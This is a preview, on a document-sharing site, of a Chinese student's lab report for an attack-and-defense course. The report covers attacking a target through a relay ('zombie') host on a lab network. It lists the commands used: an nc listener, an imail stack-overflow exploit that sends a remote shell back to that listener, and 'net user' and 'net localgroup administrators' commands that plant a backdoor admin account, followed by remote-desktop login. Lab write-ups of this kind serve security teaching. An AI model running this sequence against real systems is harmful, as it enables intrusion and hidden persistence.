《利用肉机攻击》word版

《利用肉机攻击》word版

ID:32868804

大小:335.50 KB

页数:5页

时间:2019-02-16

《利用肉机攻击》word版_第1页
《利用肉机攻击》word版_第2页
《利用肉机攻击》word版_第3页
《利用肉机攻击》word版_第4页
《利用肉机攻击》word版_第5页
资源描述:

《《利用肉机攻击》word版》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库

1、信息系统攻击与防御实验报告实验题目:利用肉机攻击目标机学院计算机学院专业网络工程班级09级01班姓名刘安琪学号40909040125实验名称:利用肉机攻击目标机实验目的:黑客利用肉机攻击目标机开放的端口,利用肉机的目的是隐藏自己的身份,以免被发现。环境配置:1.目标机为:192.168.11.612.本地机为:192.168.11.663.目标机的389端口即ldap服务打开4.本地机的c盘下存在imail、nc软件,imail为栈溢出漏洞,可以利用该漏洞攻击对方,nc为小软件实现监听本地机器的未占用端口。5.本地机的c盘下存在mstsc文件实验相关知

2、识:1、端口对应的服务:25FMTP邮件42WINS110POP33389终端服务389LDAP服务2、如何看本地端口?使用命令:netstat-an3、黑客、肉机、目标机示意图:肉机1在内网中,IP地址为:192.168.11.100Internet出口地址:202.29.12.100则:DMzadministrator看到的应为即内部地址:192.168.11.100但从cmd中的命令行看到的是internet出口地址202.29.12.100实验步骤:1、运行cmd命令进入命令提示状态;提示结果:2、打开目标机的端口389:使用命令:telnet

3、目标机端口具体为:telnet192.168.11.61389提示结果:当目标机389端口打开时显示黑屏,则认为目标机的389端口已打开。3、监听目标机的端口81(80一般不用)使用命令:nc–l–p81//其中:-l表示监听,-p表示端口,81和80为本地机器的端口。提示结果:4、另外打开一个命令窗口,因为nc命令一直在监听81端口方法:运行cmd提示结果:5、输入imail命令,进入对方机器使用命令:imail7_8–t0–h目标机–i肉机–p81//其中:-h表示目标机,-i表示肉机具体为:imail7_8–t0–h192.168.11.62–i

4、192.168.11.66–p81提示结果:6、在目标机中加入用户使用命令:netuser用户名密码/add具体为:netuserhack119123/add提示结果:7、将所加用户加入组本地组使用命令:netlocalgroupadministrators用户名/add具体为:netlocalgroupadministratorshack119/add提示结果:8、运行mtstc文件,连接目标机,进行用户名登陆,并且进行克隆账号使用命令:mtstc提示结果:9、进入对方机器点击连接按钮即可。

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。